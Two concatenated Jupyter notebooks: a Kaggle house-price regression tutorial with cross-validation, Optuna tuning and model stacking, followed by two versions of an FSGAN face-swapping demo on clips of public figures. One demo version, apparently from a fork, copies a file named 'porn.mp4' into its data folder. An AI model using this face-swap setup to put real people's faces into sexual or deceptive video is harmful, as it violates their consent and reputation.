path | concatenated_notebook
---|---|
_notebooks/2021_09_26_kaggle_Housing_Prices.ipynb | ###Markdown
Kaggle Housing Prices
> This is a Kaggle starter notebook for Predicting Housing Prices
- toc: true
- badges: true
- comments: true
- categories: [kaggle, starter]
- images: images/housing-prices.png
###Code
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python
# For example, here are several helpful packages to load
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
# Input data files are available in the read-only "../input/" directory
# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory
import os
for dirname, _, filenames in os.walk('/kaggle/input'):
for filename in filenames:
print(os.path.join(dirname, filename))
# You can write up to 20GB to the current directory (/kaggle/working/) that gets preserved as output when you create a version using "Save & Run All"
# You can also write temporary files to /kaggle/temp/, but they won't be saved outside of the current session
from pathlib import Path
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split, KFold
from sklearn.linear_model import LinearRegression, Ridge, Lasso
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.svm import SVR
from xgboost import XGBRFRegressor, XGBRegressor
from lightgbm import LGBMRegressor
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from sklearn.impute import SimpleImputer, KNNImputer
from sklearn.compose import ColumnTransformer
from sklearn.pipeline import Pipeline
from sklearn.metrics import mean_squared_log_error, mean_squared_error
from functools import partial
import optuna
optuna.logging.set_verbosity(optuna.logging.ERROR)
def rmse(y_true, y_pred):
return np.sqrt(mean_squared_error(y_true, y_pred))
DATA_DIR = Path("/kaggle/input/house-prices-advanced-regression-techniques/")
train_df = pd.read_csv(DATA_DIR / "train.csv")
test_df = pd.read_csv(DATA_DIR / "test.csv")
sub_df = pd.read_csv(DATA_DIR / "sample_submission.csv")
train_df.head()
# Find numerical and categorical columns
# Keep only columns that are mostly non-null (get_features below keeps columns with at least 50% non-null values)
train_df.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 1460 entries, 0 to 1459
Data columns (total 81 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 Id 1460 non-null int64
1 MSSubClass 1460 non-null int64
2 MSZoning 1460 non-null object
3 LotFrontage 1201 non-null float64
4 LotArea 1460 non-null int64
5 Street 1460 non-null object
6 Alley 91 non-null object
7 LotShape 1460 non-null object
8 LandContour 1460 non-null object
9 Utilities 1460 non-null object
10 LotConfig 1460 non-null object
11 LandSlope 1460 non-null object
12 Neighborhood 1460 non-null object
13 Condition1 1460 non-null object
14 Condition2 1460 non-null object
15 BldgType 1460 non-null object
16 HouseStyle 1460 non-null object
17 OverallQual 1460 non-null int64
18 OverallCond 1460 non-null int64
19 YearBuilt 1460 non-null int64
20 YearRemodAdd 1460 non-null int64
21 RoofStyle 1460 non-null object
22 RoofMatl 1460 non-null object
23 Exterior1st 1460 non-null object
24 Exterior2nd 1460 non-null object
25 MasVnrType 1452 non-null object
26 MasVnrArea 1452 non-null float64
27 ExterQual 1460 non-null object
28 ExterCond 1460 non-null object
29 Foundation 1460 non-null object
30 BsmtQual 1423 non-null object
31 BsmtCond 1423 non-null object
32 BsmtExposure 1422 non-null object
33 BsmtFinType1 1423 non-null object
34 BsmtFinSF1 1460 non-null int64
35 BsmtFinType2 1422 non-null object
36 BsmtFinSF2 1460 non-null int64
37 BsmtUnfSF 1460 non-null int64
38 TotalBsmtSF 1460 non-null int64
39 Heating 1460 non-null object
40 HeatingQC 1460 non-null object
41 CentralAir 1460 non-null object
42 Electrical 1459 non-null object
43 1stFlrSF 1460 non-null int64
44 2ndFlrSF 1460 non-null int64
45 LowQualFinSF 1460 non-null int64
46 GrLivArea 1460 non-null int64
47 BsmtFullBath 1460 non-null int64
48 BsmtHalfBath 1460 non-null int64
49 FullBath 1460 non-null int64
50 HalfBath 1460 non-null int64
51 BedroomAbvGr 1460 non-null int64
52 KitchenAbvGr 1460 non-null int64
53 KitchenQual 1460 non-null object
54 TotRmsAbvGrd 1460 non-null int64
55 Functional 1460 non-null object
56 Fireplaces 1460 non-null int64
57 FireplaceQu 770 non-null object
58 GarageType 1379 non-null object
59 GarageYrBlt 1379 non-null float64
60 GarageFinish 1379 non-null object
61 GarageCars 1460 non-null int64
62 GarageArea 1460 non-null int64
63 GarageQual 1379 non-null object
64 GarageCond 1379 non-null object
65 PavedDrive 1460 non-null object
66 WoodDeckSF 1460 non-null int64
67 OpenPorchSF 1460 non-null int64
68 EnclosedPorch 1460 non-null int64
69 3SsnPorch 1460 non-null int64
70 ScreenPorch 1460 non-null int64
71 PoolArea 1460 non-null int64
72 PoolQC 7 non-null object
73 Fence 281 non-null object
74 MiscFeature 54 non-null object
75 MiscVal 1460 non-null int64
76 MoSold 1460 non-null int64
77 YrSold 1460 non-null int64
78 SaleType 1460 non-null object
79 SaleCondition 1460 non-null object
80 SalePrice 1460 non-null int64
dtypes: float64(3), int64(35), object(43)
memory usage: 924.0+ KB
###Markdown
EDA
###Code
# Most of the homes have sale price between 100-200K
train_df["SalePrice"].hist(bins=50)
# The log transform turns the long-tailed distribution into a roughly normal one,
# so we model log(SalePrice) and invert with exp() at prediction time
np.log(train_df["SalePrice"]).hist(bins=50);
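# Illustrative aside (not part of the original flow): the leaderboard metric is RMSE on
# the log of the price, i.e. essentially RMSLE, so RMSE computed on log(SalePrice) is
# the quantity we care about. The "predictions" below are made up just to show that the
# two numbers nearly coincide for strictly positive prices.
y_true = train_df["SalePrice"].values
y_fake = y_true * np.random.uniform(0.9, 1.1, size=len(y_true))
print("RMSLE (sklearn, log1p):", np.sqrt(mean_squared_log_error(y_true, y_fake)))
print("RMSE on log targets   :", rmse(np.log(y_true), np.log(y_fake)))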
# Observe that only two houses have over 700K Sale Price
# Maybe we should exclude them from the dataset, since there is not much we can learn from two data points
train_df.plot(kind="scatter", x="Id", y="SalePrice", alpha=0.25)
plt.figure(figsize=(12,10))
sns.heatmap(train_df.corr(), cmap='Greys');
train_df.corr()
corr_cols = train_df.corr()["SalePrice"].nlargest(15).index
corr_cols
plt.figure(figsize=(10, 6))
sns.heatmap(train_df.loc[:, corr_cols].corr(), annot=True, cmap="gray")
## Let's look at the features most correlated with SalePrice
# Overall quality has a big impact on SalePrice
train_df.plot(kind="scatter", x="OverallQual", y="SalePrice", alpha=0.25)
## Let's look at the features most correlated with SalePrice
# GrLivArea is also strongly correlated.
# There are only four data points over 4,000 sq ft. Should we include them?
train_df.plot(kind="scatter", x="GrLivArea", y="SalePrice", alpha=0.25)
train_df[train_df.GrLivArea > 4000]
# GarageArea is also strongly correlated with SalePrice.
# Only a handful of points have a garage over 1,200 sq ft. Should we include them?
train_df.plot(kind="scatter", x="GarageArea", y="SalePrice", alpha=0.25)
train_df[train_df.GarageArea > 1200]
# Exclude the two rows that are over 700k
train_df = train_df[train_df["SalePrice"] < 700000]
# Automatic way to select all Categorical and Numeric Columns
def get_features(train_df):
num_features, cat_features = [], []
for col in train_df.columns:
if col in ["Id", "SalePrice"]:
continue
dtype = train_df[col].dtype
ratio = pd.notna(train_df[col]).sum() / len(train_df[col])
if ratio < 0.5:
continue
if dtype == "object":
cat_features.append(col)
else:
num_features.append(col)
return num_features, cat_features
num_features, cat_features = get_features(train_df)
cat_features
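# Quick check (illustrative): which columns does the 50% non-null filter in
# get_features drop? These should be the very sparse ones seen in .info() above,
# e.g. Alley, PoolQC, Fence and MiscFeature.
dropped = [col for col in train_df.columns
           if col not in num_features + cat_features + ["Id", "SalePrice"]]
print(dropped)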
def get_preprocess_pipeline(train_df, sample_features=False):
# Get Numeric and Categorical Features
numeric_features, categorical_features = get_features(train_df)
target = "SalePrice"
if sample_features:
numeric_features = ["LotArea"]
categorical_features = ["SaleType", "SaleCondition"]
numeric_transformer = Pipeline(steps=[
('imputer', KNNImputer(n_neighbors=5)),
('scaler', StandardScaler())])
categorical_transformer = Pipeline(steps=[
('imputer', SimpleImputer(strategy='constant', fill_value='N/A')),
        ('onehot', OneHotEncoder(handle_unknown='ignore'))])
preprocessor = ColumnTransformer(
transformers=[
('num', numeric_transformer, numeric_features),
('cat', categorical_transformer, categorical_features)])
return preprocessor, numeric_features + categorical_features, target
def train_LR(train_df, test_df, sample_features=False):
"""
Train a Linear Regression Model
"""
# Start with simple linear Model
preprocessor, features, target = get_preprocess_pipeline(train_df, sample_features=sample_features)
clf = Pipeline(steps=[('preprocessor', preprocessor),
('classifier', LinearRegression())])
X_train = train_df[features]
y_train = np.log(train_df[target])
X_test = test_df[features]
X_train, X_valid, y_train, y_valid = train_test_split(X_train, y_train, test_size=0.2, random_state=0)
clf.fit(X_train, y_train)
print("RMSE Log Error", rmse(clf.predict(X_valid), y_valid))
    # At prediction time, apply exp() to invert the log transform used during training
sub_df = pd.DataFrame({
"Id": test_df["Id"],
"SalePrice": np.exp(clf.predict(X_test))
})
return sub_df
# Choose only a small sample of features (2-3) to test the pipeline end to end
sub_df = train_LR(train_df, test_df, sample_features=True)
sub_df.to_csv("submission_lr_sample.csv", index=False)
# Make a submission to Kaggle after downloading the submission file from right side (data -> output)
# Let's improve the model by giving it more features
sub_df = train_LR(train_df, test_df, sample_features=False)
sub_df.to_csv("submission_lr.csv", index=False)
# Make a submission to Kaggle after downloading the submission file from right side (data -> output)
kfold = KFold(n_splits=10, shuffle=True, random_state=42)
for p1, p2 in kfold.split(range(20)):
print(p1, p2)
kfold = KFold(n_splits=7, shuffle=True, random_state=42)
for idxs in kfold.split(train_df):
print(idxs[0].shape, idxs[1].shape)
idxs
def hyperparam_finder_nocv(df, model_fn, trial):
    """
    Hyperparameter objective without cross-validation:
    fit on a single train/valid split and return the validation RMSE.
    """
    # Build the model suggested by this Optuna trial
    model = model_fn(trial)
    preprocessor, features, target = get_preprocess_pipeline(df, sample_features=False)
    clf = Pipeline(steps=[('preprocessor', preprocessor),
                          ('classifier', model)])
    X_train = df[features]
    y_train = np.log(df[target])
    X_train, X_valid, y_train, y_valid = train_test_split(X_train, y_train, test_size=0.2, random_state=0)
    clf.fit(X_train, y_train)
    return rmse(clf.predict(X_valid), y_valid)
def hyperparam_finder(df, model_fn, trial):
    """
    Hyperparameter objective with 5-fold cross-validation:
    return the mean validation RMSE across folds.
    """
    # Build the model suggested by this Optuna trial
    model = model_fn(trial)
    kfold = KFold(n_splits=5, shuffle=True, random_state=42)
    valid_errors = []
    for train_idxs, valid_idxs in kfold.split(df):
        train_df = df.iloc[train_idxs]
        valid_df = df.iloc[valid_idxs]
        preprocessor, features, target = get_preprocess_pipeline(train_df, sample_features=False)
        clf = Pipeline(steps=[('preprocessor', preprocessor),
                              ('classifier', model)])
        X_train = train_df[features]
        y_train = np.log(train_df[target])
        X_valid = valid_df[features]
        y_valid = np.log(valid_df[target])
        clf.fit(X_train, y_train)
        y_valid_preds = clf.predict(X_valid)
        valid_errors.append(rmse(y_valid_preds, y_valid))
    # Return the mean validation score for hyperparameter tuning
    return np.mean(valid_errors)
# You should have seen an improvement on the leaderboard from giving the model more features.
# Now let's do K-fold cross-validation (5 folds).
def train_kfold(df, test_df, ModelClass, **model_kwargs):
"""
Train a Regression Model with 5 Fold CV
"""
    # Generic K-fold training loop for any sklearn-style regressor
kfold = KFold(n_splits=5, shuffle=True, random_state=42)
valid_errors = []
test_preds = []
valid_preds = []
for train_idxs, valid_idxs in kfold.split(df):
train_df = df.iloc[train_idxs]
valid_df = df.iloc[valid_idxs]
preprocessor, features, target = get_preprocess_pipeline(train_df, sample_features=False)
clf = Pipeline(steps=[('preprocessor', preprocessor),
('classifier', ModelClass(**model_kwargs))])
X_train = train_df[features]
y_train = np.log(train_df[target])
X_valid = valid_df[features]
y_valid = np.log(valid_df[target])
X_test = test_df[features]
clf.fit(X_train, y_train)
y_valid_preds = clf.predict(X_valid)
valid_errors.append(rmse(y_valid_preds, y_valid))
test_preds.append(np.exp(clf.predict(X_test)))
valid_preds.append(pd.DataFrame({
"Id": valid_df["Id"],
"SalePrice": np.exp(y_valid_preds)
}))
print("RMSE Log Error", np.mean(valid_errors))
    # At prediction time, apply exp() to invert the log transform used during training
sub_df = pd.DataFrame({
"Id": test_df["Id"],
"SalePrice": np.mean(test_preds, axis=0)
})
# Return test prediction with CV and the Validation Prediction (For Stacking later)
return sub_df, pd.concat(valid_preds)
# Rerun the linear model, this time with 5-fold cross-validation
model1_sub_df, model1_valid_preds = train_kfold(train_df, test_df, LinearRegression)
sub_df.to_csv("submission_lr_kfold.csv", index=False)
# Make a submission to Kaggle after downloading the submission file from right side (data -> output)
# Score might have improved over the LR without kfold.
def train_XGB_kfold(df, test_df):
"""
Train a XGBoost Model with 5 Fold CV
"""
    # XGBoost regressor trained with 5-fold CV
kfold = KFold(n_splits=5, shuffle=True, random_state=42)
valid_errors = []
test_preds = []
valid_preds = []
    for train_idxs, valid_idxs in kfold.split(df.index.values):
        # use positional indexing: kfold returns positions, not index labels
        train_df = df.iloc[train_idxs]
        valid_df = df.iloc[valid_idxs]
preprocessor, features, target = get_preprocess_pipeline(train_df, sample_features=False)
clf = Pipeline(steps=[('preprocessor', preprocessor),
('classifier', XGBRegressor(n_jobs=-1, n_estimators=500, max_depth=20))])
X_train = train_df[features]
y_train = np.log(train_df[target])
X_valid = valid_df[features]
y_valid = np.log(valid_df[target])
X_test = test_df[features]
clf.fit(X_train, y_train)
y_valid_preds = clf.predict(X_valid)
valid_errors.append(rmse(y_valid_preds, y_valid))
test_preds.append(np.exp(clf.predict(X_test)))
valid_preds.append(pd.DataFrame({
"Id": valid_df["Id"],
"SalePrice": np.exp(y_valid_preds)
}))
print("Mean Squared Log Error", np.mean(valid_errors))
# On Prediction, do exp to inverse the loge done during training
sub_df = pd.DataFrame({
"Id": test_df["Id"],
"SalePrice": np.mean(test_preds, axis=0)
})
# Return test prediction with CV and the Validation Prediction (For Stacking later)
return sub_df, pd.concat(valid_preds)
def train_RF_kfold(df, test_df):
"""
Train a RF Model with 5 Fold CV
"""
    # Random forest trained with 5-fold CV
kfold = KFold(n_splits=5, shuffle=True, random_state=42)
valid_errors = []
test_preds = []
valid_preds = []
    for train_idxs, valid_idxs in kfold.split(df.index.values):
        # use positional indexing: kfold returns positions, not index labels
        train_df = df.iloc[train_idxs]
        valid_df = df.iloc[valid_idxs]
preprocessor, features, target = get_preprocess_pipeline(train_df, sample_features=False)
clf = Pipeline(steps=[('preprocessor', preprocessor),
('classifier', RandomForestRegressor(n_jobs=-1, max_depth=20))])
X_train = train_df[features]
y_train = np.log(train_df[target])
X_valid = valid_df[features]
y_valid = np.log(valid_df[target])
X_test = test_df[features]
clf.fit(X_train, y_train)
y_valid_preds = clf.predict(X_valid)
        valid_errors.append(rmse(y_valid_preds, y_valid))
test_preds.append(np.exp(clf.predict(X_test)))
valid_preds.append(pd.DataFrame({
"Id": valid_df["Id"],
"SalePrice": np.exp(y_valid_preds)
}))
print("Mean Squared Log Error", np.mean(valid_errors))
# On Prediction, do exp to inverse the loge done during training
sub_df = pd.DataFrame({
"Id": test_df["Id"],
"SalePrice": np.mean(test_preds, axis=0)
})
# Return test prediction with CV and the Validation Prediction (For Stacking later)
return sub_df, pd.concat(valid_preds)
Ridge()
def lasso_hparams_finder(trial):
alpha = trial.suggest_float("alpha", 0, 1.0)
max_iter = trial.suggest_int("max_iter", 500, 5000)
return Lasso(alpha=alpha, max_iter=max_iter)
def ridge_hparams_finder(trial):
alpha = trial.suggest_float("alpha", 0, 1.0)
max_iter = trial.suggest_int("max_iter", 500, 5000)
return Ridge(alpha=alpha, max_iter=max_iter)
def xgb_hparams_finder(trial):
max_depth = trial.suggest_int("max_depth", 5, 30)
n_estimators = trial.suggest_int("n_estimators", 100, 300)
learning_rate = trial.suggest_float("learning_rate", 0.001, 1)
tree_method = trial.suggest_categorical("tree_method", ["gpu_hist"])
gamma = trial.suggest_float("gamma", 0, 1)
eta = trial.suggest_float("eta", 0, 1)
return XGBRegressor(
max_depth=max_depth,
n_estimators=n_estimators,
learning_rate=learning_rate,
tree_method=tree_method,
gamma=gamma,
eta=eta
)
def rf_hparams_finder(trial):
max_depth = trial.suggest_int("max_depth", 10, 50)
n_estimators = trial.suggest_int("n_estimators", 100, 300)
return RandomForestRegressor(n_estimators=n_estimators, max_depth=max_depth)
def lightgbm_hparams_finder(trial):
max_depth = trial.suggest_int("max_depth", 5, 30)
n_estimators = trial.suggest_int("n_estimators", 100, 300)
learning_rate = trial.suggest_float("learning_rate", 0.001, 1)
reg_alpha = trial.suggest_float("reg_alpha", 0., 1)
reg_lambda = trial.suggest_float("reg_lambda", 0., 1)
return LGBMRegressor(max_depth=max_depth,
n_estimators=n_estimators,
learning_rate=learning_rate, reg_alpha=reg_alpha, reg_lambda=reg_lambda)
def svr_hparams_finder(trial):
    # 'precomputed' is excluded: it requires a precomputed kernel matrix, not a feature matrix
    kernel = trial.suggest_categorical("kernel",
                                       ['linear', 'poly', 'rbf', 'sigmoid'])
    degree = trial.suggest_int("degree", 1, 4)
    c = trial.suggest_float("c", 1e-3, 1.0)
    max_iter = trial.suggest_int("max_iter", 50, 500)
    return SVR(kernel=kernel, degree=degree, C=c, max_iter=max_iter)
# Tune Lasso hyperparameters with Optuna, using the cross-validated objective
study = optuna.create_study()
study.optimize(partial(hyperparam_finder, train_df, lasso_hparams_finder),
n_trials=100,
show_progress_bar=True
)
lasso_params = study.best_params  # e.g. {'alpha': ..., 'max_iter': ...}
# Tune each model family with Optuna (single-split objective to keep it fast)
model_options = {
"ridge": ridge_hparams_finder,
"lasso": lasso_hparams_finder,
"xgb": xgb_hparams_finder,
"rf": rf_hparams_finder,
"ligtgbm": lightgbm_hparams_finder,
"svr": svr_hparams_finder
}
best_hparams = []
for model_name, model_hparams_fn in model_options.items():
print(model_name)
    study = optuna.create_study()
study.optimize(partial(hyperparam_finder_nocv, train_df, model_hparams_fn),
n_trials=20,
show_progress_bar=True
)
best_hparams.append({
model_name: study.best_params
})
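# Illustrative follow-up (an assumption, not something the original ran): gather the
# tuned settings into one lookup so a chosen model can be retrained with them,
# e.g. train_kfold(train_df, test_df, RandomForestRegressor, **tuned["rf"]).
tuned = {name: params for entry in best_hparams for name, params in entry.items()}
print(list(tuned.keys()))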
# Model 1: Ridge regression with 5-fold CV
model1_test_preds, model1_valid_preds = train_kfold(train_df, test_df, Ridge)
# Model 2: XGBoost with 5-fold CV
model2_test_preds, model2_valid_preds = train_kfold(train_df, test_df, XGBRegressor, n_jobs=4, n_estimators=500, max_depth=20)
# Model 3: Random forest with 5-fold CV
model3_test_preds, model3_valid_preds = train_kfold(train_df, test_df, RandomForestRegressor,n_jobs=4, n_estimators=500, max_depth=20)
# Model 4: SVR with 5-fold CV
model4_test_preds, model4_valid_preds = train_kfold(train_df, test_df, SVR)
# Model 5: LightGBM with 5-fold CV
model5_test_preds, model5_valid_preds = train_kfold(train_df, test_df, LGBMRegressor, n_jobs=4, n_estimators=500, max_depth=20)
model1_valid_preds.rename(columns={"SalePrice": "model1_preds"}, inplace=True)
model2_valid_preds.rename(columns={"SalePrice": "model2_preds"}, inplace=True)
model3_valid_preds.rename(columns={"SalePrice": "model3_preds"}, inplace=True)
model4_valid_preds.rename(columns={"SalePrice": "model4_preds"}, inplace=True)
model5_valid_preds.rename(columns={"SalePrice": "model5_preds"}, inplace=True)
model1_test_preds.rename(columns={"SalePrice": "model1_preds"}, inplace=True)
model2_test_preds.rename(columns={"SalePrice": "model2_preds"}, inplace=True)
model3_test_preds.rename(columns={"SalePrice": "model3_preds"}, inplace=True)
model4_test_preds.rename(columns={"SalePrice": "model4_preds"}, inplace=True)
model5_test_preds.rename(columns={"SalePrice": "model5_preds"}, inplace=True)
pd.merge(model1_test_preds, model2_test_preds, left_on="Id", right_on="Id")
# Model blending - take the average of the five model predictions
sub_df = pd.merge(model1_test_preds, model2_test_preds, left_on="Id", right_on="Id")
sub_df = pd.merge(sub_df, model3_test_preds, left_on="Id", right_on="Id")
sub_df = pd.merge(sub_df, model4_test_preds, left_on="Id", right_on="Id")
sub_df = pd.merge(sub_df, model5_test_preds, left_on="Id", right_on="Id")
sub_df["SalePrice"] = (sub_df["model1_preds"] + sub_df["model2_preds"] + sub_df["model3_preds"] + sub_df["model4_preds"] + sub_df["model5_preds"])/5
sub_df[["Id", "SalePrice"]].to_csv("submission_model_blend.csv", index=False)
# You should have seen an improvement on the leaderboard with K-fold CV.
# Now let's do model stacking.
# We trained five CV models above (Ridge, XGBoost, RandomForest, SVR, LightGBM),
# averaged their test predictions for the blend, and kept their out-of-fold
# validation predictions to train a second-level (stacking) model below.
layer1_test_df = pd.merge(model1_test_preds, model2_test_preds, left_on="Id", right_on="Id")
layer1_test_df = pd.merge(layer1_test_df, model3_test_preds, left_on="Id", right_on="Id")
layer1_test_df = pd.merge(layer1_test_df, model4_test_preds, left_on="Id", right_on="Id")
layer1_test_df = pd.merge(layer1_test_df, model5_test_preds, left_on="Id", right_on="Id")
layer1_test_df.head()
layer1_train_df = pd.merge(model1_valid_preds, model2_valid_preds, left_on="Id", right_on="Id")
layer1_train_df = pd.merge(layer1_train_df, model3_valid_preds, left_on="Id", right_on="Id")
layer1_train_df = pd.merge(layer1_train_df, model4_valid_preds, left_on="Id", right_on="Id")
layer1_train_df = pd.merge(layer1_train_df, model5_valid_preds, left_on="Id", right_on="Id")
layer1_train_df = pd.merge(layer1_train_df, train_df[["Id", "SalePrice"]], left_on="Id", right_on="Id")
layer1_train_df.head()
# Finally, try model stacking: use the out-of-fold validation predictions from the
# CV models as features to train a new second-level model for the final prediction.
def train_model_stacking_kfold(df, test_df):
"""
Train a Linear Regression Model with 5 Fold CV
"""
# Start with simple linear Model
kfold = KFold(n_splits=5, shuffle=True, random_state=42)
valid_errors = []
test_preds = []
features = ["model1_preds", "model2_preds", "model3_preds", "model4_preds", "model5_preds"]
df = df.copy()
test_df = test_df.copy()
for feat in features:
df[feat] = np.log(df[feat])
test_df[feat] = np.log(test_df[feat])
df["SalePrice"] = np.log(df["SalePrice"])
for train_idxs, valid_idxs in kfold.split(df):
train_df = df.loc[train_idxs]
valid_df = df.loc[valid_idxs]
X_train = train_df[features]
y_train = train_df["SalePrice"]
X_valid = valid_df[features]
y_valid = valid_df["SalePrice"]
X_test = test_df[features]
clf = LinearRegression()
clf.fit(X_train, y_train)
y_valid_preds = clf.predict(X_valid)
valid_errors.append(rmse(y_valid_preds, y_valid))
test_preds.append(np.exp(clf.predict(X_test)))
print("RMSE Log Error", np.mean(valid_errors))
    # At prediction time, apply exp() to invert the log transform used during training
sub_df = pd.DataFrame({
"Id": test_df["Id"],
"SalePrice": np.mean(test_preds, axis=0)
})
# Return test prediction with CV
return sub_df
sub_df = train_model_stacking_kfold(layer1_train_df, layer1_test_df)
sub_df[["Id", "SalePrice"]].to_csv("submission_model_stack.csv", index=False)
import lightgbm
###Output
_____no_output_____ |
inference/face_swapping.ipynb | ###Markdown
FSGAN Face Swapping Demo. A Tesla P100 GPU is recommended for this demo.
###Code
!nvidia-smi
###Output
_____no_output_____
###Markdown
Installation
###Code
import sys
from IPython.display import HTML, clear_output
from base64 import b64encode
# Install the required dependencies
!wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh
!bash Miniconda3-latest-Linux-x86_64.sh -bfp /usr/local
!rm Miniconda3-latest-Linux-x86_64.sh
!conda install pytorch torchvision cudatoolkit=10.1 -c pytorch -y
!pip3 install opencv-python ffmpeg-python youtube-dl yacs
!mkdir -p /content/projects/
%cd /content/projects/
!git clone https://github.com/YuvalNirkin/face_detection_dsfd
!git clone https://github.com/wordsand/fsgan.git
sys.path += ['/usr/local/lib/python3.9/site-packages', '/content/projects']
# Initialize source and target videos from the repository examples
!mkdir -p /content/data
!cp /content/projects/fsgan/docs/examples/shinzo_abe.mp4 /content/data/source.mp4
!cp /content/projects/fsgan/docs/examples/conan_obrien.mp4 /content/data/target.mp4
!cp /content/projects/fsgan/docs/examples/cl.mp4 /content/data/cl.mp4
!cp /content/projects/fsgan/docs/examples/porn.mp4 /content/data/porn.mp4
# Utility functions
import ffmpeg
def encode_audio(video_path, audio_path, output_path):
ffmpeg.concat(ffmpeg.input(video_path), ffmpeg.input(audio_path), v=1, a=1) \
.output(output_path, strict='-2').run(overwrite_output=True)
def display_video(video_path, width=640, clear=True):
vid_data = open(video_path,'rb').read()
vid_url = 'data:video/mp4;base64,' + b64encode(vid_data).decode()
if clear:
clear_output()
return HTML(f"""
<video width={width} controls>
<source src={vid_url} type="video/mp4">
</video>
""")
###Output
_____no_output_____
###Markdown
Mount your Google Drive using the following step or click on "Mount Drive" in the menu to the left
###Code
from google.colab import drive
drive.mount('/content/drive')
###Output
_____no_output_____
###Markdown
Initialize face swapping
###Code
import os
from fsgan.inference.swap import FaceSwapping
from fsgan.criterions.vgg_loss import VGGLoss
#@markdown This step should only be done once unless one of the
#@markdown following parameters is changed:
#@markdown ---
#@markdown Path to the weights directory (make sure it is correct):
weights_dir = '/content/drive/My Drive/fsgan/weights' #@param {type:"string"}
#@markdown Number of finetune iterations on the source subject:
finetune_iterations = 800 #@param {type:"slider", min:100, max:2000, step:1}
#@markdown If True, the inner part of the mouth will be removed from the segmentation:
seg_remove_mouth = True #@param {type:"boolean"}
#@markdown Segmentation batch size
seg_batch_size = 24 #@param {type:"slider", min:1, max:64, step:1}
#@markdown Inference batch size
batch_size = 8 #@param {type:"slider", min:1, max:64, step:1}
#@markdown ---
detection_model = os.path.join(weights_dir, 'v2/WIDERFace_DSFD_RES152.pth')
pose_model = os.path.join(weights_dir, 'shared/hopenet_robust_alpha1.pth')
lms_model = os.path.join(weights_dir, 'v2/hr18_wflw_landmarks.pth')
seg_model = os.path.join(weights_dir, 'v2/celeba_unet_256_1_2_segmentation_v2.pth')
reenactment_model = os.path.join(weights_dir, 'v2/nfv_msrunet_256_1_2_reenactment_v2.1.pth')
completion_model = os.path.join(weights_dir, 'v2/ijbc_msrunet_256_1_2_inpainting_v2.pth')
blending_model = os.path.join(weights_dir, 'v2/ijbc_msrunet_256_1_2_blending_v2.pth')
criterion_id_path = os.path.join(weights_dir, 'v2/vggface2_vgg19_256_1_2_id.pth')
criterion_id = VGGLoss(criterion_id_path)
face_swapping = FaceSwapping(
detection_model=detection_model, pose_model=pose_model, lms_model=lms_model,
seg_model=seg_model, reenactment_model=reenactment_model,
completion_model=completion_model, blending_model=blending_model,
criterion_id=criterion_id,
finetune=True, finetune_save=True, finetune_iterations=finetune_iterations,
    seg_remove_mouth=seg_remove_mouth, batch_size=batch_size,
seg_batch_size=seg_batch_size, encoder_codec='mp4v')
###Output
_____no_output_____
###Markdown
Optional: Download source video from YouTube. You can change the source URL, start and end times [hh:mm:ss]. Alternatively, manually upload an image or video to **_data_** (in the menu to the left) and rename to **_source.jpg_** or **_source.mp4_** (click "Refresh" if missing). By default the source video will be taken from the repository examples. Optional: Download target video from YouTube. You can change the target URL, start and end times [hh:mm:ss]. Alternatively, manually upload a video to **_data_** (in the menu to the left) and rename to **_target.mp4_** (click "Refresh" if missing). By default the target video will be taken from the repository examples. Do face swapping
###Code
# Do face swapping
#@markdown ---
#@markdown Toggle whether to finetune the reenactment generator:
finetune = True #@param {type:"boolean"}
#@markdown Source path
source_path = '/content/data/source.mp4' #@param {type:"string"}
#@markdown Source selection method ["longest" | sequence number]:
select_source = 'longest' #@param {type:"string"}
#@markdown Target path
target_path = '/content/data/target.mp4' #@param {type:"string"}
#@markdown Target selection method ["longest" | sequence number]:
select_target = 'longest' #@param {type:"string"}
#@markdown ---
output_tmp_path = '/content/data/output_tmp.mp4'
output_path = '/content/output.mp4'
face_swapping(source_path, target_path, output_tmp_path,
select_source, select_target, finetune)
# Encode with audio and display result
encode_audio(output_tmp_path, target_path, output_path)
os.remove(output_tmp_path)
display_video(output_path)
###Output
_____no_output_____
###Markdown
FSGAN Face Swapping Demo. Fill out [this form](https://docs.google.com/forms/d/e/1FAIpQLScyyNWoFvyaxxfyaPLnCIAxXgdxLEMwR9Sayjh3JpWseuYlOA/viewform?usp=sf_link), and after receiving the email, add the FSGAN shared directory to your drive. Acknowledgements: We thank Dr. Eyal Gruss, [wangchao0899](https://github.com/wangchao0899), [jjandnn](https://github.com/jjandnn), and [zhuhaozh](https://github.com/zhuhaozh) for helping with this demo. A Tesla P100 GPU is required for this demo. Let's make sure that we have it:
###Code
!nvidia-smi
###Output
_____no_output_____
###Markdown
Installation
###Code
import sys
from IPython.display import HTML, clear_output
from base64 import b64encode
# Install the required dependencies
!wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh
!bash Miniconda3-latest-Linux-x86_64.sh -bfp /usr/local
!rm Miniconda3-latest-Linux-x86_64.sh
!pip3 install opencv-python ffmpeg-python youtube-dl yacs
!mkdir -p /content/projects/
%cd /content/projects/
!git clone https://github.com/YuvalNirkin/face_detection_dsfd
!git clone https://github.com/YuvalNirkin/fsgan.git
sys.path += ['/usr/local/lib/python3.7/site-packages', '/content/projects']
# Initialize source and target videos from the repository examples
!mkdir -p /content/data
!cp /content/projects/fsgan/docs/examples/shinzo_abe.mp4 /content/data/source.mp4
!cp /content/projects/fsgan/docs/examples/conan_obrien.mp4 /content/data/target.mp4
# Utility functions
import ffmpeg
def encode_audio(video_path, audio_path, output_path):
ffmpeg.concat(ffmpeg.input(video_path), ffmpeg.input(audio_path), v=1, a=1) \
.output(output_path, strict='-2').run(overwrite_output=True)
def display_video(video_path, width=640, clear=True):
vid_data = open(video_path,'rb').read()
vid_url = 'data:video/mp4;base64,' + b64encode(vid_data).decode()
if clear:
clear_output()
return HTML(f"""
<video width={width} controls>
<source src={vid_url} type="video/mp4">
</video>
""")
###Output
_____no_output_____
###Markdown
Mount your Google Drive using the following step or click on "Mount Drive" in the menu to the left
